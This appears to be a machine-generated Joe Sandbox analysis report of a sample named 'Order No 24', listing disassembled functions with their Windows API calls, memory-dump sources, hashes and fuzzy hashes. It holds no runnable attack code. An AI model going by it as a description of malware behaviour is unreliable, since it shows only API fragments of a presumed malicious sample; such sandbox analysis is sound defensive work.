                                                                                                                                  • GetMenuItemCount.USER32(?), ref: 009C4EE5
                                                                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 009C4F01
                                                                                                                                  • GetMenuItemID.USER32(?,-00000001), ref: 009C4F2B
                                                                                                                                  • GetMenuItemID.USER32(?,?), ref: 009C4F70
                                                                                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 009C4FB6
                                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009C4FCA
                                                                                                                                  • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009C4FEB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4176008265-0
                                                                                                                                  • Opcode ID: e50d924df2c575edaddfc5fa5f29d14de5d830c10d48e7aa713685513cdb1a8c
                                                                                                                                  • Instruction ID: 50cf3579290d22ea257922831c98cfc7b6f99dbc8730d3b4f871547578e3b122
                                                                                                                                  • Opcode Fuzzy Hash: e50d924df2c575edaddfc5fa5f29d14de5d830c10d48e7aa713685513cdb1a8c
                                                                                                                                  • Instruction Fuzzy Hash: DA617D75E00249AFEB21CFA4DC98FAE7BB8EB85314F14055DF841A7291D731AD46CB22
                                                                                                                                  Function 009E9C16 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 009E9C98
                                                                                                                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 009E9C9B
                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 009E9CBF
                                                                                                                                  • _memset.LIBCMT ref: 009E9CD0
                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 009E9CE2
                                                                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 009E9D5A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$LongWindow_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 830647256-0
                                                                                                                                  • Opcode ID: 5c6207e0dbd66fa2f3c80b52ed186865568ede7da5199668380f1bdf65006904
                                                                                                                                  • Instruction ID: 3085c65ec2f1e7823db79c6fd9d1f2415f3e6112c105e3704ea4b1c6b2a8d050
                                                                                                                                  • Opcode Fuzzy Hash: 5c6207e0dbd66fa2f3c80b52ed186865568ede7da5199668380f1bdf65006904
                                                                                                                                  • Instruction Fuzzy Hash: E7617C79900248AFDB11DFA8CC81FEEB7B8EB49704F144159FA04A7292D774AD82DB50
                                                                                                                                  Function 009B94E1 Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 009B94FE
                                                                                                                                  • SafeArrayAllocData.OLEAUT32(?), ref: 009B9549
                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 009B955B
                                                                                                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 009B957B
                                                                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 009B95BE
                                                                                                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 009B95D2
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 009B95E7
                                                                                                                                  • SafeArrayDestroyData.OLEAUT32(?), ref: 009B95F4
                                                                                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 009B95FD
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 009B960F
                                                                                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 009B961A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2706829360-0
                                                                                                                                  • Opcode ID: 52e8dc66a532b0b67f31ac2d06f0f5bb04b41d6f084bbe7361b85f98b58efa7b
                                                                                                                                  • Instruction ID: 31f8cffcde1698c7c1c3f1cd66512a2371e738956f3bd56f04b8c267a7ddf7d9
                                                                                                                                  • Opcode Fuzzy Hash: 52e8dc66a532b0b67f31ac2d06f0f5bb04b41d6f084bbe7361b85f98b58efa7b
                                                                                                                                  • Instruction Fuzzy Hash: 73412F7591021DAFCB01DFE4D884ADEBB79FF48354F008069F902A3261DB71EA46CBA1
                                                                                                                                  Function 009DADAE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0098936C: __swprintf.LIBCMT ref: 009893AB
                                                                                                                                    • Part of subcall function 0098936C: __itow.LIBCMT ref: 009893DF
                                                                                                                                  • CoInitialize.OLE32 ref: 009DADF6
                                                                                                                                  • CoUninitialize.OLE32 ref: 009DAE01
                                                                                                                                  • CoCreateInstance.OLE32(?,00000000,00000017,00A0D8FC,?), ref: 009DAE61
                                                                                                                                  • IIDFromString.OLE32(?,?), ref: 009DAED4
                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 009DAF6E
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 009DAFCF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                  • API String ID: 834269672-1287834457
                                                                                                                                  • Opcode ID: 99e4e8716356e0ccff7785ed2e8ae3e7c649b97a7626e5d9948b554918813a6f
                                                                                                                                  • Instruction ID: 0c8f50af6de8c709983bad77ea1e089ddb5f8a8380aa83930bd7797d319c9364
                                                                                                                                  • Opcode Fuzzy Hash: 99e4e8716356e0ccff7785ed2e8ae3e7c649b97a7626e5d9948b554918813a6f
                                                                                                                                  • Instruction Fuzzy Hash: 2761AE71248301AFC710DF94C848B6EBBE8AF89714F14894AF9859B391C774ED59CBA3
                                                                                                                                  Function 009D8107 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • WSAStartup.WSOCK32(00000101,?), ref: 009D8168
                                                                                                                                  • inet_addr.WSOCK32(?,?,?), ref: 009D81AD
                                                                                                                                  • gethostbyname.WSOCK32(?), ref: 009D81B9
                                                                                                                                  • IcmpCreateFile.IPHLPAPI ref: 009D81C7
                                                                                                                                  • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 009D8237
                                                                                                                                  • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 009D824D
                                                                                                                                  • IcmpCloseHandle.IPHLPAPI(00000000), ref: 009D82C2
                                                                                                                                  • WSACleanup.WSOCK32 ref: 009D82C8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                  • String ID: Ping
                                                                                                                                  • API String ID: 1028309954-2246546115
                                                                                                                                  • Opcode ID: 82a5a3ece25020be3e33b91d54f3c2104b04a1df1f7779e3f6b1c890c881ecaf
                                                                                                                                  • Instruction ID: fa5112d5a5934e7b87dd317ff640696a45212acb902ce981646aa28428497027
                                                                                                                                  • Opcode Fuzzy Hash: 82a5a3ece25020be3e33b91d54f3c2104b04a1df1f7779e3f6b1c890c881ecaf
                                                                                                                                  • Instruction Fuzzy Hash: B5518231644700AFDB11EF64CC45B2BB7E4AF88760F04895AFA65D73A1DB74E906CB42
                                                                                                                                  Function 009E9E43 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 009E9E5B
                                                                                                                                  • CreateMenu.USER32 ref: 009E9E76
                                                                                                                                  • SetMenu.USER32(?,00000000), ref: 009E9E85
                                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009E9F12
                                                                                                                                  • IsMenu.USER32(?), ref: 009E9F28
                                                                                                                                  • CreatePopupMenu.USER32 ref: 009E9F32
                                                                                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 009E9F63
                                                                                                                                  • DrawMenuBar.USER32 ref: 009E9F71
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                                  • String ID: 0
                                                                                                                                  • API String ID: 176399719-4108050209
                                                                                                                                  • Opcode ID: d7de6b7b4d82886a929fc8b6237277570dcd98df7514bdbc2f4a03c31d6cfeab
                                                                                                                                  • Instruction ID: 2e66a9ee40bf51f420b0f5839705aabc43f6bb69878d99a2c6cfa4a4b2fa7030
                                                                                                                                  • Opcode Fuzzy Hash: d7de6b7b4d82886a929fc8b6237277570dcd98df7514bdbc2f4a03c31d6cfeab
                                                                                                                                  • Instruction Fuzzy Hash: 8D4177B9A00249AFDB21DFA5D844BAABBB9FF89314F144428FD45A7360D731AD11CF50
                                                                                                                                  Function 009CE389 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 009CE396
                                                                                                                                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 009CE40C
                                                                                                                                  • GetLastError.KERNEL32 ref: 009CE416
                                                                                                                                  • SetErrorMode.KERNEL32(00000000,READY), ref: 009CE483
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                  • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                  • API String ID: 4194297153-14809454
                                                                                                                                  • Opcode ID: 729ea0fda1243656dbdc2cc77539087129beb623d9f09de77029af6c49da42da
                                                                                                                                  • Instruction ID: 1beb08af9addf994ab4e69314735b3fb98519c507b187a1eed8b8948cad118dd
                                                                                                                                  • Opcode Fuzzy Hash: 729ea0fda1243656dbdc2cc77539087129beb623d9f09de77029af6c49da42da
                                                                                                                                  • Instruction Fuzzy Hash: 2F315436E00209AFDB05EBA4D945FBDB7B8FF44304F148419F506EB2A1DB749946CB52
                                                                                                                                  Function 009BB907 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 009BB98C
                                                                                                                                  • GetDlgCtrlID.USER32 ref: 009BB997
                                                                                                                                  • GetParent.USER32 ref: 009BB9B3
                                                                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 009BB9B6
                                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 009BB9BF
                                                                                                                                  • GetParent.USER32(?), ref: 009BB9DB
                                                                                                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 009BB9DE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$CtrlParent
                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                  • API String ID: 1383977212-1403004172
                                                                                                                                  • Opcode ID: 901c44cf9f938b3a1fffa1a90ffaef4a906c70f7062eca797d5f20f3a8c4b1b5
                                                                                                                                  • Instruction ID: 04a05984ee7080f5e6afb7e5730731ba1ba7653eed6139fff060ad44674a931b
                                                                                                                                  • Opcode Fuzzy Hash: 901c44cf9f938b3a1fffa1a90ffaef4a906c70f7062eca797d5f20f3a8c4b1b5
                                                                                                                                  • Instruction Fuzzy Hash: 6B2162B5900108BFDB04EBA4CC85EFEB7B9AF45314F10411AF551972D1DBB55916DB20
                                                                                                                                  Function 009BB9F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 009BBA73
                                                                                                                                  • GetDlgCtrlID.USER32 ref: 009BBA7E
                                                                                                                                  • GetParent.USER32 ref: 009BBA9A
                                                                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 009BBA9D
                                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 009BBAA6
                                                                                                                                  • GetParent.USER32(?), ref: 009BBAC2
                                                                                                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 009BBAC5
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$CtrlParent
                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                  • API String ID: 1383977212-1403004172
                                                                                                                                  • Opcode ID: f5c38d4383be20d2641b904d7455eda2362ef4cdc279d3d225bb4e6a5acf20b8
                                                                                                                                  • Instruction ID: ee029e6a49cc657cde5a03b33ec313253c30c034e509d3a026dcf531dbfa6317
                                                                                                                                  • Opcode Fuzzy Hash: f5c38d4383be20d2641b904d7455eda2362ef4cdc279d3d225bb4e6a5acf20b8
                                                                                                                                  • Instruction Fuzzy Hash: 33217FB5A40108BBDB01EBA4CC85FFEBBB9EF45310F10401AF551A7292DBB9591A9B20
                                                                                                                                  Function 009BBAD7 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetParent.USER32 ref: 009BBAE3
                                                                                                                                  • GetClassNameW.USER32(00000000,?,00000100), ref: 009BBAF8
                                                                                                                                  • _wcscmp.LIBCMT ref: 009BBB0A
                                                                                                                                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 009BBB85
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                  • API String ID: 1704125052-3381328864
                                                                                                                                  • Opcode ID: 744b91c7082103a1e2d06c39e5943a85d9738b4704fb58cbdf05f3f1887b17fa
                                                                                                                                  • Instruction ID: c525345b4d4c3c84c4cd49f9edf6c2f0f99cde4a50312a7511787d21c657af9a
                                                                                                                                  • Opcode Fuzzy Hash: 744b91c7082103a1e2d06c39e5943a85d9738b4704fb58cbdf05f3f1887b17fa
                                                                                                                                  • Instruction Fuzzy Hash: F4112977A48317FEFA206630DC07EE6379CAB91774F200022F904E50D5EFE6A8125654
                                                                                                                                  Function 009DB2A9 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 009DB2D5
                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 009DB302
                                                                                                                                  • CoUninitialize.OLE32 ref: 009DB30C
                                                                                                                                  • GetRunningObjectTable.OLE32(00000000,?), ref: 009DB40C
                                                                                                                                  • SetErrorMode.KERNEL32(00000001,00000029), ref: 009DB539
                                                                                                                                  • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 009DB56D
                                                                                                                                  • CoGetObject.OLE32(?,00000000,00A0D91C,?), ref: 009DB590
                                                                                                                                  • SetErrorMode.KERNEL32(00000000), ref: 009DB5A3
                                                                                                                                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 009DB623
                                                                                                                                  • VariantClear.OLEAUT32(00A0D91C), ref: 009DB633
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2395222682-0
                                                                                                                                  • Opcode ID: dc297bc409e370f42f383d93b1319fe0efa12cdc421fdc35f954371e408d44d6
                                                                                                                                  • Instruction ID: d2f6e7f2afa63c56f99ffb7d5d47931b87c64dbb58e6b9c72d3d45b8944af156
                                                                                                                                  • Opcode Fuzzy Hash: dc297bc409e370f42f383d93b1319fe0efa12cdc421fdc35f954371e408d44d6
                                                                                                                                  • Instruction Fuzzy Hash: 96C11471608305EFC700DFA4C884A6AB7E9BF89344F05891EF58A9B361DB71ED06CB52
                                                                                                                                  Function 009C67E9 Relevance: 15.1, APIs: 10, Instructions: 107windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __swprintf.LIBCMT ref: 009C67FD
                                                                                                                                  • __swprintf.LIBCMT ref: 009C680A
                                                                                                                                    • Part of subcall function 009A172B: __woutput_l.LIBCMT ref: 009A1784
                                                                                                                                  • FindResourceW.KERNEL32(?,?,0000000E), ref: 009C6834
                                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 009C6840
                                                                                                                                  • LockResource.KERNEL32(00000000), ref: 009C684D
                                                                                                                                  • FindResourceW.KERNEL32(?,?,00000003), ref: 009C686D
                                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 009C687F
                                                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 009C688E
                                                                                                                                  • LockResource.KERNEL32(?), ref: 009C689A
                                                                                                                                  • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 009C68F9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1433390588-0
                                                                                                                                  • Opcode ID: 20aea01246079f11ec5071709dc9f407cec5c4ee9a5b96e2c0632ebdb5e4465e
                                                                                                                                  • Instruction ID: aefe19f826c290228c45f96880119b1e0ee9258f6c72338ca08959f1dbc8c796
                                                                                                                                  • Opcode Fuzzy Hash: 20aea01246079f11ec5071709dc9f407cec5c4ee9a5b96e2c0632ebdb5e4465e
                                                                                                                                  • Instruction Fuzzy Hash: D1316D7690021AABDB11DFA0DD45EBA7BACEF49381F008429F902E2150E774D952DBA1
                                                                                                                                  Function 009FDD4A Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetSysColor.USER32(00000008), ref: 0099B496
                                                                                                                                  • SetTextColor.GDI32(?,000000FF), ref: 0099B4A0
                                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 0099B4B5
                                                                                                                                  • GetStockObject.GDI32(00000005), ref: 0099B4BD
                                                                                                                                  • GetClientRect.USER32(?), ref: 009FDD63
